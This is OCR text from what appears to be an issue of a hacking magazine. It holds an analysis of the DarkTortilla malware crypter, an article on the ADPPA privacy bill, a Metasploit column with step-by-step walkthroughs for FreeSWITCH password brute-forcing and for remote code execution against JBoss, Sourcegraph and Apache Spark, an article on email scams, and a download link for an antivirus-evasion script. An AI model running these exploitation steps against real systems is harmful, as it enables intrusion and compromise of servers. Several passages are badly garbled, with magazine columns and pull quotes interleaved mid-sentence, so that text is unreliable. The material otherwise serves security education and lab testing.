All the configuration required for core processor in an encrypted format in the form of images.
The care processor extracts the encrypted configuration and parses the decrypted data into a struc
-ture that can easily be for referenced. The core processor has many functions which can be confi-
gured by attackers as per their need. Some of the important functions are, Fake Message Box,
Melt function, Installation function, Persistence function, RunPE process injection function, Anti-
VM and Anti-Sandbox functions.
A newly discovered vulnerability in a Python module could affect over 3, 50, 000
Python projects.
31
1. Fake Message Box
Dark Tortilla can be configured to show a Message Box when it is executed. This box
can be useful for threat actors to fool victims into thinking that a legitimate app is being loaded wh
-ile actually it is a malware that’s running.
2. Melt
This feature if enabled allows threat actors to move the initial loader executable to the Windows
%TEMP% directory.
3. Installation
This option can be used to install DarkTortilla on the system. The installation directory can also b
-e configured by the threat actor.
4. Persistence
You already know what this is.
5. RunPE Process Injection
DarkTortilla can execute its payloads using process injection. With this method, the payload is onl
-y executed in memory and not on the system.
6. Anti -VM Features
This feature of Dark Tortilla enables its Anti-VM controls. The core processor queries various
WMI objects to detect if it is running in a virtual machine. The core processor also queries inform-
ation about the systems running processes and services for any strings associated with VirtualBox,
VMware, Hyper-V etc. If it detects any of the above, it terminates the initial loader process immed
-iately.
7. Anti - SandBox Features
If this feature is enabled, the core processor searches for a process named "sandboxpiercss" proce-
ss. If it is present, the process is terminated.
Main Payload

The primary function of the core processor is to process the main payload. As already told at the
beginning of this article, the payload can be a information stealer or a commodity RAT. Dark
Tortilla executes the main payload using RunPE process injection. Hence the main payload reside
-s only in memory.

Attackers are exploiting the recently revealed vulnerability in Atlassain Confluence


Servers for illicit cryptocurrency mining.
32
ADDON Packages
The most important feature of DarkTortilla is not its main payload but its addon packages.
DarkTortilla can be configured with zero or more payloads which doesn’t include its main payloa-
d. These are known as addon packages.
Researchers of CTU at SecureWorks observed addons that include benign decoy documents,
additional DarkTortilla payloads, legitimate executables, Keyloggers, Clipboard stealers and crypt
-o currency miners. DarkTortilla can be configured to install these add on packages either in mem
-ory or on system.
Some experts are of the opinion that researchers focussed so much on the main payload of
DarkTortilla that they ignored the add on packages This may have further helped DarkTortilla in
evading detection.
ANTI - Analysis
DarkTortilla took many measures to avoid detection. CTU researchers observed that the core
processor samples of DarkTortilla were obfuscated using the ConfuserEX code obfuscator. Apart
from this, specially crafted code was injected into the samples. This code did not affect the normal
(malicious) execution of the crypter but inhibited decompiling of the sample by tools like dnspy.
Researchers also "The focus on main payload and observed the code to
detect debuggers inside the DarkTortilla sample
but this code was not ignoring ADDON packages too may called. However, resear
-chers are not yet sure if have helped DarkTortilla. There is this was added by the
author of the crypter or ConfuserEX itself.
Seven years one mystery still to be solved about without detection is a
great feat (although malicious) as a DarkTortilla. " crypter. But how did DarkTortilla eva
-de detection so many years?
In addition to all the measures the makers took to avoid detection and analysis of its code, it
seems DarkTortilla evades detection by getting lost in so many .NET crypters available on interne
t. The focus on main payload and ignoring ADDON packages too may have helped DarkTortilla.
There is one mystery still to be solved about DarkTortilla. Nobody knows how this crypter reache
-d threat actors.
"Despite scouring underground marketplaces and forums, we’ve been unable to find where or
how DarkTortilla is being sold." said Rob Pantazopoulos, Security Researcher, SecureWorks. In
an interview to TheHackernews.
ANTI -Tamper Features
DarkTortilla has many features to prevent anyone from tampering with its working. They are,
1. It immediately (core processor) immediately reruns the subprocess running the main payload if
it is terminated.
2. Initial loader executable is rerun immediately if terminated. DarkTortilla achieves this using a
secondary .NET based executable named "WatchDog".
3. The core processor ensures that the dropped Watchdog executable is continuously executed.
4.The core processor also maintains persistence for the initial loader.
5. The core processor also delays execution at some stages of the process.
(THE END)
33
A new US data privacy bill aims to give you more control over information
collected about you – and make businesses change how they handle data.

ONLINE SECURITY
(Cont'd From Page 14) avoid civil litigation. Plus, courts have honed
state laws specifically regulating facial recognitio- ECPA’s terms, providing clear precedent and un
n technology. The preemption provisions, howe- -derstandable compliance guidelines.
ver, are in flux as members of the House contin-
ue to negotiate the bill.
ADPPA’s national standards provide uniform
compliance requirements, serving economic effi- The changes to U.S. data privacy law are big,
ciency; but its preemption of most state laws has but ADPPA affords much-needed security and
some scholars concerned, and California oppose data protections to U.S. citizens, and I believe th
-s its passage. -at it is workable with tweaks.
If preemption stands, any final version of the Given how the internet works, data routinely
ADPPA will be the law of the land, limiting state flows across international borders, so many U.S.
-s from more firmly protecting their citizens’ data companies have already built compliance with
privacy. other nations’ laws into their systems. This inclu-
des the E.U.’s General Data Protection Regulati-
on – a law similar to the ADPPA. Facebook, for
example, provides E.U. citizens with GDPR’s
ADDPA provides for a private right of action, al protections, but it does not give U.S. citizens tho-
-lowing people to sue covered entities who violat se protections, because it is not required to do
e their rights under ADPPA. That gives the bill’s so.
enforcement mechanisms a big boost, although Congress has done little with data privacy, but
it has significant restrictions. ADPPA is poised to change that.
The U.S. Chamber of Commerce and the tech
industry oppose a private right of action, preferri
-ng ADPPA enforcement be restricted to the
Federal Trade Commission. But the FTC has far
This Article first
less staff and far fewer resources than U.S. trial
attorneys do.
appeared in
ECPA, for comparison, has a private right of
action. It has not overwhelmed courts or busines
The Conversation
-ses, and entities likely comply with ECPA to

BitDefender released a decryptor for the LockerGoga ransomware in collaboration with


Europol, No More Ransom Project and Zurich law enforcement authrities.
34
FreeSwitch, JBoss EAP/AS Remoting, Sourcegraph & Apache Spark
METASPLOIT THIS MONTH
Welcome to Metasploit This Month. Let us learn about the latest exploit modules of Metasploit
and how they fare in our tests.
FreeSWITCH Login Module
TARGET: FreeSwitch TYPE: Remote
  MODULE : Auxiliary       ANTI-MALWARE : NA
FreeSWITCH is a free and open-source application server for real-time communication,
WebRTC, telecommunications, video and Voice over Internet Protocol (VoIP). This module is a
login utility to find the password of the FreeSWITCH event socket service by bruteforcing the logi
-n interface. Note that this service does not require a username to log in; login is done purely via
supplying a valid password. We tested it on the latest version of FreeSWITCH. Let's set the target
first.

The target's ready. Note that we have started this FreeSWITCH container by setting the password
35
as "hunter". Let's see how this module works. Start Metasploit and load the freeswitch_event_sock-
et_login module.
36
Set all the required options and execute the module. If you don't set any dictionary, the module
will use the default dictionary.

As readers can see, the module successfully cracked the password.


JBoss EAP/AS Remoting RCE Module
TARGET: JBoss <= 6.1.0 TYPE: Remote
  MODULE : Exploit       ANTI-MALWARE : NA
JBoss is a division of Red Hat that provides support for Wildfly opensource application server
program (JBoss AS) and related middleware services. JBoss EAP is an Enterprise application platf-
orm for building, deploying and hosting Java applications and services.
The above-mentioned versions of the JBOSS have a java deserialization vulnerability in
Remoting unified Invoker interface. We have tested this on JBoss container of version 6.1.0. Let’s
set the target first. Create two new files named docker-compose.yml and Dockerfile on Kali Linux.
Copy the contents from the file given below into the file docker-compose.yml.
version: "3 "
services:
web:
build:
ports:
- "8080: 8080"
- "9990: 9990"
- "4447: 4447"
- "9999: 9999"
- "4446: 4446"
- "3 873 : 3 873 "
- "4445 : 4445 "
networks:
internet:
aliases:
- j boss-as-61
networks:
internet:
driver: bridge
37

Similarly copy the contents of the below file into file named Dockerfile.
FROM jboss/base-jdk:8
# Set the JBOSS_VERSION env variable
ENV JBOSS_HOME /opt/jboss/jboss-as-6.1
ENV EAP_HOME /opt/jboss/jboss-as-6.1
# Add the JBoss distribution to /opt, and make jboss the owner of the extracted zip
content
# https://jbossas.jboss.org/downloads
RUN curl https://download.jboss.org/jbossas/6.1/jboss-as-distribution-6.1.0.Final.zip -o
/opt/jboss/jboss-as-6.1.0.zip
RUN jar -xvf /opt/jboss/jboss-as-6.1.0.zip \
&& mv /opt/jboss/jboss-6.1.0.Final $EAP_HOME \
&& chmod a+x $EAP_HOME/bin/*
# Ensure signals are forwarded to the JVM process correctly for graceful shutdown
#ENV LAUNCH_JBOSS_IN_BACKGROUND true
# Enable binding to all network interfaces and debugging inside the EAP
RUN echo "JAVA_OPTS=\"\$JAVA_OPTS -Djboss.bind.address=0.0.0.0
-Djboss.bind.address.management=0.0.0.0\"" >> ${EAP_HOME}/bin/run.conf
# Expose the ports we're interested in
EXPOSE 8080 9990 4447 9999 4446 3873 4445
# Set the default command to run on boot
# This will boot JBoss EAP in the standalone mode and bind to all interface
ENTRYPOINT ["/opt/jboss/jboss-as-6.1/bin/run.sh"]
38

Let’s load the containers.

It is ready as shown below.

The target is ready. Let’s see how this module works. Load the JBoss remoting module.
39
40

Set all the required options as shown below and use check command to see if the target is indeed
vulnerable.

The target is indeed vulnerable, Now set the LHOST option and execute the module.
41
As readers can see, we successfully have a shell with the privileges of "JBoss" user.
Sourcegraph Gitserver Exec RCE Module

TARGET: Sourcegraph TYPE: Remote  


                      MODULE : Exploit       ANTI-MALWARE : NA
Sourcegraph is a web-based code search and navigation tool for development teams. Almost all
versions of Sourcegraph (amhiguity due to some patched versions are also reportedly vulnerable)
are vulnerable to unauthenticated RCE in their GIT server component.
Due to this, commands can be executed in the context of the git server. We have tested this on
Sourcegraph version 3.36.3. Let’s set the target first.

Note that the module will only be successful if there is at least one git repository on the target
server. Let’s see how to add a git repository to this git server first. Once the Docker container is
LIVE, visit the IP Address of the target container on port 7080. That is where source graph web
interface is running.
42
Create an account.

Once you are successfully logged in, go to Repositories > Manage code hosts.

Scroll down to find "Generic Git Host" and click on it.


43

In the Add a repository field, add the following code. This code is a JSON snippet to add
Metasploit repository.

{
"url": "https://github.com/",
"repos": [
"rapid7/metasploit-framework.git"
]
}
44
The cloning of the repository takes some time. So be patient. Once the repository is finished cloni-
ng, the target is ready.

The cloning of the repository takes some time. So be patient. Once the repository is finished cloni-
ng, the target is ready.

Load the sourcegraph_gitserver_sshcmd module.

Ransomware As A Service groups have been spotted using Emotet to distribute


Quantum and BlackCat ransomware.
45
46

Set RHOSTS option and use "check" command to see if the target is indeed vulnerable.
47
The target is indeed vulnerable. Set the other required options and execute the module.

As readers can see, we successfully have a meterpreter session.

Apache Spark RCE Module


TARGET: Apache spark versions <=3.0.3,3.1.1 and 3.1.2,3.2.0 to 3.2.1    
    TYPE: Remote   MODULE : Exploit       ANTI-MALWARE : NA
Apache Spark is an open source, distributed processing system that is used for big data
workloads. The above mentioned versions of Apache Spark have a remote code execution vulner
-ability. How is this possible?
The Apache Spark UI offers the possibility to enable Access Control Lists (ACL) to its users.
This can be done using the configuration option ` spark.acls.enable` . This option along with an au
-thentication filter, checks whether a user has access permissions to view or modify the application.
This permission check is coded using a bash command shell and the unix id command that allow-
s a malicious shell command injection.
We have tested this on Apache spark3.1.1 running as Docker container. Here is the
docker.compose.yml file.

Samsung has admitted that a data breach exposed details of some of their US
customers.
48

version: '2'
services:
spark:
image: docker.io/bitnami/spark:3.1.1
environment:
- SPARK_MODE=master
- SPARK_RPC_AUTHENTICATION_ENABLED=no
- SPARK_RPC_ENCRYPTION_ENABLED=no
- SPARK_LOCAL_STORAGE_ENCRYPTION_ENABLED=no
- SPARK_SSL_ENABLED=no
ports:
- '8080:8080'

Le t’ s se t the targe t.
49

The target’s live but not yet ready. Run the following commands in a new terminal to interact with
spark container.

In the container bash session enter the command

Use cat command to check if the spark.acls.enable option is enabled.


50

Now the target’s ready. Load the apache_spark_rce_cve_2022_3282 module.

https://haveibeenpwned.com
51
52
Set the RHOST option and use check command to see if the target is vulnerable.

The target is indeed vulnerable. Set the LHOST option and execute the module.

As readers can see, we successfully have a shell.


Follow Hackercool Magazine For Latest Updates
53
Email Scams Are Getting More Personal - They Even Fool Cybersecurity
Experts
EMAIL SECURITY
falling out of fashion. Instead, scammers are sco-
Gareth Norris uring social media, especially business-related on
Senior Lecturer, Department Of Psychology, -es like LinkedIn, to target people with tailored
messages. The strength of a relationship between
Aberystwyth University two people can be measured by inspecting their
posts and comments to each other. In the first
Max Elza, quarter of 2022, LinkedIn accounted for 52% of
Senior Lecturer in Computer Security, all phishing scams globally.
Liverpool John Moores University
Oliver Buckley, Psychologists who research obedience to authori
Associate Professor In Cyber Security, -ty know we are more likely to respond to reque-
University Of East Anglia sts from people higher up in our social and prof-
essional hierarchies. And fraudsters know it too.
We all like to think we’re immune to scams. We Scammers don’t need to spend much time
scoff at emails from an unknown sender offering researching corporate structures. “I’m at the conf
us £2 million, in exchange for our bank details. erence and my phone ran out of credit. Can you
But the game has changed and con artists have ask XXX to send me report XXX?” runs a typic-
developed new, chilling "The infamous “prince of Nigeria” al scam message.
tactics. They are taking emails are falling out of fashion. Data from Google Safe
the personal approach and Browsing shows there are
scouring the internet for Instead, scammers are scouring now nearly 75 times as m-
all the details they can social media, especially business-any phishing sites as there
find about us. are malware sites on the
Scammers are getting related ones like LinkedIn, to target internet. Almost 20% of
so good at it that even people with tailored messages." all employees are likely
cybersecurity experts are to click on phishing email
taken in. One of us (Oliver Buckley) recalls that links, and, of those, a staggering 68% go on to en
in 2018 he received an email from the pro-vice -ter their credentials on a phishing website.
chancellor of his university. Globally, email spam cons cost businesses
This is it, I thought. I’m finally getting recognition nearly US$20 billion (£17 billion) every year. Bu-
from the people at the top. Something wasn’t right, siness consultant and tax auditor BDO’s researc-
though. Why was the pro-vice chancellor using his h found that six out of ten mid-sized business in
Gmail address? I asked how I could meet. He neede- the UK were victims of fraud in 2020, suffering
d me to buy 800 pounds worth of iTunes gift cards average losses of £245,000.
for him, and all I needed to do was scratch off the Targets are normally chosen based on their
back and send him the code. Not wanting to let him rank, age or social status. Sometimes, spamming
down, I offered to pop down to his PA’s office and is part of a coordinated cyber attack against a
lend him the 5 pound note I had in my wallet. But specific organisation so targets are selected if the-
I never heard back from him. y work or have connections to this organisation.
The infamous “prince of Nigeria” emails are (Cont'd On Next Page)
54
Fraudsters are using spam bots to engage with
victims who respond to the initial hook email.
The bot uses recent information from LinkedIn Even if you’re tempted to bait email
and other social media platforms to gain the vict- scammers, don’t. Even confirming your email
im’s trust and lure them into giving valuable info address is in use can make you a target for futur-
-rmation or transferring money. This started over e scams. There is also a more human element to
the last two to three years with the addition of ch these scams compared with the blanket bombin-
-atbots to websites to increase interactions with g approach scammers have favoured for the last
customers. Recent examples include the Royal two decades. It’s eerily intimate.
Mail chatbot scam, DHL Express, and Facebook One simple way to avoid being tricked is to
Messenger. Unfortunately for the public, many double-check the sender’s details and email hea-
companies offer free and paid services to build a ders. Think about the information that might be
chatbot. out there about you, not just about what you rec-
And more technical solutions are available for eive and who from. If you have another means
scammers these days to conceal their identities of contacting that person, do so.
such as using anonymous communication chann We should all be careful with our data. The
-els or fake IP addresses. rule of thumb is if you don’t want someone to k-
Social media is making it easier for scammers now it, then don’t put it online.
to craft believable emails called spear phishing. The more advanced technology gets, the easier
The data we share every day gives fraudsters clu it is to take a human approach. Video call techn-
-es about our lives they can use against us. It cou ology and messaging apps bring you closer to yo
-ld be something as simple as somewhere you re -ur friends and family. But it’s giving people who
cently visited or a website you use. Unlike gener would do you harm a window into your life. So
-al phishing (large numbers of spam emails) this we have to use our human defences: gut instinct.
nuanced approach exploits our tendency to atta- If something doesn’t feel right, pay attention.
ch significance to information that has some con-
nection or for us. When we check our full inbox
, we often pick out something that strikes a chor-
This Article first
d. This is referred to in psychology as the illusor-
y correlation: seeing things as related when they
appeared in
aren’t. The Conversation

DOWNLOADS
1. SharpEvader Script :
https://github.com/Xyan1d3/SharpEvader

2. Kali Linux 2022.3 :


https://www.kali.org/get-kali/
55

Now,
You can
also
read
Hackercool
Magazine on
Magzter
&
Zinio.

You might also like